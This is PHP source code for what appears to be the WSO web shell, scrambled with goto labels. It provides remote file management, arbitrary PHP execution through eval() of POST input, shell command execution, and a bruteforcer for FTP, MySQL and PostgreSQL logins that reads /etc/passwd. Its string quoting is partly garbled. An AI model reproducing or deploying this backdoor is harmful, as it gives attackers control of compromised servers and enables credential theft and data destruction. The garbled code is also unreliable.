goto zxeby;
qhDI4:
closedir($dh);
goto SLRoZ;
ld2N6:
}
goto Jstso;
Jstso:
if (is_array(@$_POST["f"])) {
foreach ($_POST["f"] as $f) {
goto Fce39;
jTf8C:
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
goto sVDIO;
Fce39:
if ($f == "..") {
continue;
}
goto NavX2;
NavX2:
$f = urldecode($f);
goto jTf8C;
sVDIO:
}
}
goto mm32x;
hEfbk:
case "paste":
goto aIzMf;
aIzMf:
if ($_COOKIE["act"] == "copy") {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto DXZu5;
OpM7_:
$h = @opendir($c . $s);
goto XF_lF;
XF_lF:
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste($c . $s . "/", $f, $d . $s . "/");
}
}
goto v_Vn9;
DXZu5:
mkdir($d . $s);
goto OpM7_;
v_Vn9:
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["f"] as $f) {
copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]);
}
} elseif ($_COOKIE["act"] == "move") {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto qKJrU;
TXDEI:
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste($c . $s . "/", $f, $d . $s . "/");
}
}
goto xPGvS;
AwOVO:
$h = @opendir($c . $s);
goto TXDEI;
qKJrU:
mkdir($d . $s);
goto AwOVO;
xPGvS:
} elseif (@is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["f"] as $f) {
@rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f);
}
} elseif ($_COOKIE["act"] == "zip") {
if (class_exists("ZipArchive")) {
$zip = new ZipArchive();
if ($zip->open($_POST["p2"], 1)) {
goto Jun5P;
Jun5P:
chdir($_COOKIE["c"]);
goto T_RpN;
MVV2r:
$zip->close();
goto CqwAG;
T_RpN:
foreach ($_COOKIE["f"] as $f) {
if ($f == "..") {
continue;
}
if (@is_file($_COOKIE["c"] . $f)) {
$zip->addFile($_COOKIE["c"] . $f, $f);
} elseif (@is_dir($_COOKIE["c"] . $f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/"));
foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key);
}
}
}
goto JhWjt;
JhWjt:
chdir($GLOBALS["cwd"]);
goto MVV2r;
CqwAG:
}
}
} elseif ($_COOKIE["act"] == "unzip") {
if (class_exists("ZipArchive")) {
$zip = new ZipArchive();
foreach ($_COOKIE["f"] as $f) {
if ($zip->open($_COOKIE["c"] . $f)) {
$zip->extractTo($GLOBALS["cwd"]);
$zip->close();
}
}
}
} elseif ($_COOKIE["act"] == "tar") {
goto nrwbR;
QmWa1:
chdir($GLOBALS["cwd"]);
goto bK26y;
zHKjB:
wsoEx("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"]));
goto QmWa1;
BU3zr:
$_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]);
goto zHKjB;
nrwbR:
chdir($_COOKIE["c"]);
goto BU3zr;
bK26y:
}
goto tJ8ED;
HwZnR:
setcookie("f", '', time() - 3600);
goto TZk2t;
TZk2t:
break;
goto yoTwQ;
tJ8ED:
unset($_COOKIE["f"]);
goto HwZnR;
yoTwQ:
default:
if (!empty($_POST["p1"])) {
goto TYMaj;
XHEG8:
WSOsetcookie("c", @$_POST["c"]);
goto Unr9o;
TYMaj:
WSOsetcookie("act", $_POST["p1"]);
goto XUMLY;
XUMLY:
WSOsetcookie("f", serialize(@$_POST["f"]));
goto XHEG8;
Unr9o:
}
break;
}
}
goto bpziK;
JbUVa:
usort($files, "wsoCmp");
goto pBUl1;
RjKbq:
function wsoCmp($a, $b)
{
if ($GLOBALS["sort"][0] != "size") {
return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1);
} else {
return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1);
}
}
goto JbUVa;
flVXx:
$GLOBALS["sort"] = $sort;
goto RjKbq;
b42P7:
echo "</select> ";
goto zga6H;
QsnjB:
$dirContent = wsoScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]);
goto DufhY;
EoM5y:
if (!empty($_POST["p1"])) {
if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) {
$sort = array($match[1], (int)$match[2]);
}
}
goto uaEIV;
ecDrl:
echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; goto QsnjB; J7jRR: if (!empty($_COOKIE["f"])) {
$_COOKIE["f"] = @unserialize($_COOKIE["f"]);
} goto uO4Od; zqQv8: foreach ($files as $f) {
echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools', null, '" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title = '{$f["link"]}'") . " ><b > [" . htmlspecialchars($f["name"]) . " ]</b > ") . "</a ></td ><td > " . ($f["type"] == "file" ? wsoViewSize($f["size"]) : $f["type"]) . "</td ><td > " . $f["modify"] . "</td ><td > " . $f["owner"] . "/" . $f["group"] . "</td ><td ><a href =# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } goto b9q_L; ICFmG: $l = 0; goto zqQv8; TSLht: $n = count($dirContent); goto p625P; lC5LC: $dirs = $files = array(); goto TSLht; uaEIV: echo "<script>\xd
function sa() {
for (i = 0; i < d . files . elements . length; i++)
\x9 if (d . files . elements[i] . type == 'checkbox') \xd\xa \x9 d . files . elements[i] . checked = d . files . elements[0] . checked;\xd\xa }\xd\xa </script >
<table width = '100%' class='main' cellspacing = '0' cellpadding = '2' > \xd
<form name = files method = post ><tr ><th width = '13px' ><input type = checkbox onclick = 'sa()' class=chkbx ></th ><th ><a href = '#' onclick = 'g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")' > Name</a ></th ><th ><a href = '#' onclick = 'g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")' > Size</a ></th ><th ><a href = '#' onclick = 'g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")' > Modify</a ></th ><th > Owner / Group</th ><th ><a href = '#' onclick = 'g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")' > Permissions</a ></th ><th > Actions</th ></tr > "; goto lC5LC; b9q_L: echo "<tr ><td colspan = 7 > \xd\xa <input type = hidden name = a value = 'FilesMan' > \xd\xa\x9<input type = hidden name = c value = '" . htmlspecialchars($GLOBALS["cwd"]) . "' >
\xa <input type = hidden name = charset value = '" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "' > \xd\xa <select name = 'p1' ><option value = 'copy' > Copy</option ><option value = 'move' > Move</option ><option value = 'delete' > Delete</option > "; goto la8rp; MMpaa: $sort = array("name", 1); goto EoM5y; bpziK: wsoHeader(); goto ecDrl; GTtN3: echo " < option value = 'tar' > Compress(tar . gz)</option > "; goto qCBL1; zga6H: if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "file name: <input type = text name = p2 value = 'wso_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "' > "; } goto T3WX2; DufhY: if ($dirContent === false) { goto KJVLY; PFKsl: wsoFooter(); goto ZsRi7; KJVLY: echo "Can't open this folder!"; goto PFKsl; ZsRi7: return; goto Uwcm2; Uwcm2: } goto S7vm3; T3WX2: echo "<input type='submit' value=' >> '></td></tr></form></table></div>"; goto LlrBb; LlrBb: wsoFooter(); goto JxN5l; S7vm3: global $sort; goto MMpaa; pBUl1: usort($dirs, "wsoCmp"); goto zukJ7; p625P: for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => wsoPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } goto flVXx; qCBL1: if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>Paste / Compress</option>"; } goto b42P7; zukJ7: $files = array_merge($dirs, $files); goto ICFmG; JxN5l: } goto KC9ar; xB4MH: function actionFilesTools() { goto BkWtk; URhzm: if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch"); } else { $m = array("Chmod", "Rename", "Touch"); } goto ehyTX; gIv2Z: echo "</div>"; goto q1Rl0; ehyTX: foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } goto OeBNf; FcH_v: if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } goto XQqyZ; tJhrh: if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } goto UpcWr; hJxBN: echo "<h1>File tools</h1><div class=content>"; goto LggyK; jReNS: if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } goto URhzm; OeBNf: echo "<br><br>"; goto kfx86; vLiGd: echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; goto jReNS; LggyK: if (!file_exists(@$_POST["p1"])) { goto uyJNU; C_fb1: return; goto fRIHs; uyJNU: echo "File not exists"; goto aEu8k; aEu8k: wsoFooter(); goto C_fb1; fRIHs: } goto RVSqZ; BkWtk: if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } goto nB0r7; UpcWr: wsoHeader(); goto hJxBN; q1Rl0: wsoFooter(); goto lZIie; RVSqZ: $uid = @posix_getpwuid(@fileowner($_POST["p1"])); goto FcH_v; kfx86: switch ($_POST["p2"]) { case "view": goto QAifq; bn9Hw: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto bbBoN; bbBoN: echo "</pre>"; goto K9Wsy; GqRN7: $fp = @fopen($_POST["p1"], "r"); goto bn9Hw; K9Wsy: break; goto xBp1j; QAifq: echo "<pre class=ml1>"; goto GqRN7; xBp1j: case "highlight": if (@is_readable($_POST["p1"])) { goto QC8Iq; XU2TQ: $code = @highlight_file($_POST["p1"], true); goto MtAXT; QC8Iq: echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; goto XU2TQ; MtAXT: echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $code) . "</div>"; goto nntLP; nntLP: } break; case "chmod": goto P8hG1; LoNwV: break; goto AyuC5; lmil1: echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value=">>"></form>"; goto LoNwV; AAUh2: clearstatcache(); goto lmil1; P8hG1: if (!empty($_POST["p3"])) { goto dVl9Y; brcvZ: for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } goto NKCFJ; NKCFJ: if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script > document . mf . p3 . value = "";</script > "; } goto PY3E2; dVl9Y: $perms = 0; goto brcvZ; PY3E2: } goto AAUh2; AyuC5: case "edit": goto H2fMN; jCDwf: echo " </textarea ><input type = submit value = ">>" ></form > "; goto Pjp_6; l2f3k: echo "<form onsubmit = "g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;" ><textarea name = text class=bigarea > "; goto B2Klk; YessQ: if (!empty($_POST["p3"])) { goto rcwpk; JCP0G: $fp = @fopen($_POST["p1"], "w"); goto UIGX9; UIGX9: if ($fp) { goto AyUGu; ZpECv: echo "Saved!<br><script > p3_ = "";</script > "; goto ukKwu; zJt34: @fclose($fp); goto ZpECv; AyUGu: @fwrite($fp, $_POST["p3"]); goto zJt34; ukKwu: @touch($_POST["p1"], $time, $time); goto w_o1Q; w_o1Q: } goto ccEmf; yLb3a: $_POST["p3"] = substr($_POST["p3"], 1); goto JCP0G; rcwpk: $time = @filemtime($_POST["p1"]); goto yLb3a; ccEmf: } goto l2f3k; H2fMN: if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } goto YessQ; B2Klk: $fp = @fopen($_POST["p1"], "r"); goto of9BR; of9BR: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto jCDwf; Pjp_6: break; goto Gznea; Gznea: case "hexdump": goto m3kPv; AuUGX: $h = array("00000000<br>", '', ''); goto GyLAr; qeOJi: $n = 0; goto AuUGX; jL3k2: echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#282828><pre>" . $h[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; goto Ufiap; m3kPv: $c = @file_get_contents($_POST["p1"]); goto qeOJi; Lem2Z: for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { goto NPU7A; NPU7A: $n = 0; goto LQkUO; fObRZ: $h[1] .= "<br>"; goto fMXko; LQkUO: if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } goto fObRZ; fMXko: $h[2] .= "
"; goto BJu_G; BJu_G: } } goto jL3k2; GyLAr: $len = strlen($c); goto Lem2Z; Ufiap: break; goto owLSP; owLSP: case "rename": goto DPp_y; zaQju: break; goto Mf7Ir; DPp_y: if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die(" < script>g(null, null, "" . urlencode($_POST["p3"]) . "", null, "") </script > "); } } goto S0xqX; S0xqX: echo "<form onsubmit = "g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.name.value);return false;" ><input type = text name = name value = "" . htmlspecialchars($_POST["p1"]) . "" ><input type = submit value = ">>" ></form > "; goto zaQju; Mf7Ir: case "touch": goto MdNj9; fcpc8: echo " < script>p3_ = "";</script ><form onsubmit = "g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;" ><input type = text name = touch value = "" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . "" ><input type = submit value = ">>" ></form > "; goto vSHOq; vSHOq: break; goto RapuR; GWQpw: clearstatcache(); goto fcpc8; MdNj9: if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } goto GWQpw; RapuR: } goto gIv2Z; nB0r7: if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { goto kEAXk; LrqUY: $fp = @fopen($_POST["p1"], "r"); goto oCCHm; rpfQA: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content - Type: " . $type); } else { header("Content - Type: application / octet - stream"); } goto LrqUY; oCCHm: if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } goto Vqm3n; PiFXF: header("Content - Disposition: attachment; filename = " . basename($_POST["p1"])); goto rpfQA; kEAXk: ob_start("ob_gzhandler", 4096); goto PiFXF; Vqm3n: } exit; } goto tJhrh; XQqyZ: echo " < span>Name:</span > " . htmlspecialchars(@basename($_POST["p1"])) . " <span > Size:</span > " . (is_file($_POST["p1"]) ? wsoViewSize(filesize($_POST["p1"])) : "-") . " < span>Permission:</span > " . wsoPermsColor($_POST["p1"]) . " <span > Owner / Group:</span > " . $uid["name"] . "/" . $gid["name"] . "<br > "; goto vLiGd; lZIie: } goto w2GF1; etiAC: function wsoPerms($p) { goto kfyb8; GUcgT: $i .= $p & 0x1 ? $p & 0x200 ? "t" : "x" : ($p & 0x200 ? "T" : " - "); goto mshmE; kfyb8: if (($p & 0xc000) == 0xc000) { $i = "s"; } elseif (($p & 0xa000) == 0xa000) { $i = "l"; } elseif (($p & 0x8000) == 0x8000) { $i = " - "; } elseif (($p & 0x6000) == 0x6000) { $i = "b"; } elseif (($p & 0x4000) == 0x4000) { $i = "d"; } elseif (($p & 0x2000) == 0x2000) { $i = "c"; } elseif (($p & 0x1000) == 0x1000) { $i = "p"; } else { $i = "u"; } goto pqnZD; GuUyD: $i .= $p & 0x2 ? "w" : " - "; goto GUcgT; Vg6sO: $i .= $p & 0x10 ? "w" : " - "; goto vneDY; I8J2d: $i .= $p & 0x40 ? $p & 0x800 ? "s" : "x" : ($p & 0x800 ? "S" : " - "); goto yfJn7; pqnZD: $i .= $p & 0x100 ? "r" : " - "; goto FjLaa; yfJn7: $i .= $p & 0x20 ? "r" : " - "; goto Vg6sO; FjLaa: $i .= $p & 0x80 ? "w" : " - "; goto I8J2d; vneDY: $i .= $p & 0x8 ? $p & 0x400 ? "s" : "x" : ($p & 0x400 ? "S" : " - "); goto e6Pjl; e6Pjl: $i .= $p & 0x4 ? "r" : " - "; goto GuUyD; mshmE: return $i; goto MofP7; MofP7: } goto eRZM6; j4eIF: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $default_use_ajax; } goto EoPoZ; qZOco: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto sO9OV; tZUOM: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto LqaMO; B8b3D: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto dPSqc; Gop14: $disable_functions = @ini_get("disable_functions"); goto oE6Ue; oHsYW: function actionPhp() { goto s1VTJ; ujMFQ: wsoFooter(); goto dfcYP; s1VTJ: if (isset($_POST["ajax"])) { goto jtGxB; XiIjv: eval($_POST["p1"]); goto pcNS1; cL7XN: ob_start(); goto XiIjv; keRr1: exit; goto cNits; t7wh1: echo strlen($temp), "
", $temp; goto keRr1; pcNS1: $temp = "document . getElementById('PhpOutput') . style . display = '';document . getElementById('PhpOutput') . innerHTML = '" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa
\'\x0") . "';\xa"; goto t7wh1; jtGxB: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto cL7XN; cNits: } goto IyHRn; wcs04: echo " </pre ></div > "; goto ujMFQ; Sz7n2: echo "<h1 > Execution PHP - code </h1 ><div class=content ><form name = pf method = post onsubmit = "if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;" ><textarea name = code class=bigarea id = PhpCode > " . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea ><input type = submit value = eval style = "margin-top:5px" > "; goto bE4Om; t2vRD: wsoHeader(); goto om2si; oWPfu: if (!empty($_POST["p1"])) { goto uFjl_; uFjl_: ob_start(); goto XYFVS; qDLEK: echo htmlspecialchars(ob_get_clean()); goto Zre8T; XYFVS: eval($_POST["p1"]); goto qDLEK; Zre8T: } goto wcs04; IyHRn: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto t2vRD; om2si: if (isset($_POST["p2"]) && $_POST["p2"] == "info") { goto u6Vem; u6Vem: echo " < h1>PHP info </h1 ><div class=content ><style >.p {
color:#000;}</style>"; goto ClNOj; ClNOj: ob_start(); goto Z0UYj; WpKFt: $tmp = preg_replace(array("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", "!td, th {(.*)}!msiU", "!<img[^>]+>!msiU"), array('', ".e, .v, .h, .h th {$1}", ''), $tmp); goto AiOL8; Z0UYj: phpinfo(); goto pDREm; pDREm: $tmp = ob_get_clean(); goto WpKFt; AiOL8: echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; goto xiXKW; xiXKW: } goto Sz7n2; bE4Om: echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; goto oWPfu; dfcYP: } goto N84uU; jB3VR: $default_charset = "Windows-1251"; goto fj9OS; rTVjF: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("bye!"); } goto i6mTz; DbGtY: function actionBruteforce() { goto uMF9i; hSv50: if (isset($_POST["proto"])) { goto jX4Q5; UnBlf: if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { goto vXxXO; zFefs: if (@$_POST["reverse"]) { goto S2jvF; oahSQ: for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } goto rxcry; S2jvF: $tmp = ''; goto oahSQ; rxcry: ++$attempts; goto TfDj5; TfDj5: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } goto lNTnA; lNTnA: } goto i039d; b2CQw: ++$attempts; goto i1_FI; i1_FI: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } goto zFefs; vXxXO: $line = explode(":", $line); goto b2CQw; i039d: } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { goto kf0wF; NI_R6: if (wsoBruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } goto JCePy; kf0wF: $line = trim($line); goto byC2k; byC2k: ++$attempts; goto NI_R6; JCePy: } } } goto VERJt; jX4Q5: echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; goto LBJl4; VERJt: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto U2KZG; ObcWW: $server = explode(":", $_POST["server"]); goto UnBlf; LBJl4: if ($_POST["proto"] == "ftp") { function wsoBruteForce($ip, $port, $login, $pass) { goto w1bnC; MJhTf: @ftp_close($fp); goto efLYK; efLYK: return $res; goto zU7bZ; aqJAG: $res = @ftp_login($fp, $login, $pass); goto MJhTf; w1bnC: $fp = @ftp_connect($ip, $port ? $port : 21); goto NYGOQ; NYGOQ: if (!$fp) { return false; } goto aqJAG; zU7bZ: } } elseif ($_POST["proto"] == "mysql") { function wsoBruteForce($ip, $port, $login, $pass) { goto nwkI1; tqKjk: @mysqli_close($res); goto lNvU5; nwkI1: $res = @mysqli_connect($ip . ":" . $port ? $port : 3306, $login, $pass); goto tqKjk; lNvU5: return $res; goto h_hcl; h_hcl: } } elseif ($_POST["proto"] == "pgsql") { function wsoBruteForce($ip, $port, $login, $pass) { goto ucMyA; DgnPW: @pg_close($res); goto qQMP_; qQMP_: return $res; goto N73qn; ucMyA: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto szIUy; szIUy: $res = @pg_connect($str); goto DgnPW; N73qn: } } goto px18Z; px18Z: $success = 0; goto aKdd5; aKdd5: $attempts = 0; goto ObcWW; U2KZG: } goto NNTq8; NNTq8: echo "<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value="127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>" . "<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" . "<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>"; goto HIh7o; uMF9i: wsoHeader(); goto hSv50; HIh7o: echo "</div><br>"; goto wlwoF; wlwoF: wsoFooter(); goto p3uSI; p3uSI: } goto wVO2a; uf2tU: $default_use_ajax = true; goto jB3VR; d62j5: function wsoEx($in) { $out = shell_exec($in); return $out; } goto yXkOt; wVO2a: function actionSql() { goto pXyEP; WqMW0: if (@$_POST["type"] == "pgsql") { echo "selected"; } goto bZFnU; qgUXu: echo "</div>"; goto G862b; G862b: wsoFooter(); goto gsteZ; bZFnU: echo ">PostgreSql</option></select></td>
\xa < td><input type = text name = sql_host value = "" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . "" ></td > \xd
<td ><input type = text name = sql_login value = "" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . "" ></td >
\xa<td ><input type = text name = sql_pass value = "" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . "" ></td ><td > "; goto dxViD; dxViD: $tmp = "<input type = text name = sql_base value = '' > "; goto L_VIT; Auorx: echo "</td > \xd\xa\x9 \x9 <td ><input type = submit value = '>>' onclick = 'fs(d.sf);' ></td > \xd\xa <td ><input type = checkbox name = sql_count value = 'on'" . (empty($_POST["sql_count"]) ? '' : " checked") . " > count the number of rows </td > \xd\xa \x9</tr > \xd\xa\x9 </table >
\x9<script > \xd
s_db = '" . @addslashes($_POST["sql_base"]) . "';\xd\xa function fs(f) {
\xd\xa if (f . sql_base . value != s_db) {
f . onsubmit = function () {
};
\xd
if (f . p1) f . p1 . value = '';\xd
if (f . p2) f . p2 . value = '';\xd\xa if (f . p3) f . p3 . value = '';\xd\xa }
\xa }\xd
\x9 \x9function st(t, l){
\xa\x9\x9 \x9d . sf . p1 . value = 'select';\xd
\x9\x9 d . sf . p2 . value = t;
\xa if (l && d . sf . p3) d . sf . p3 . value = l;\xd
d . sf . submit();
}
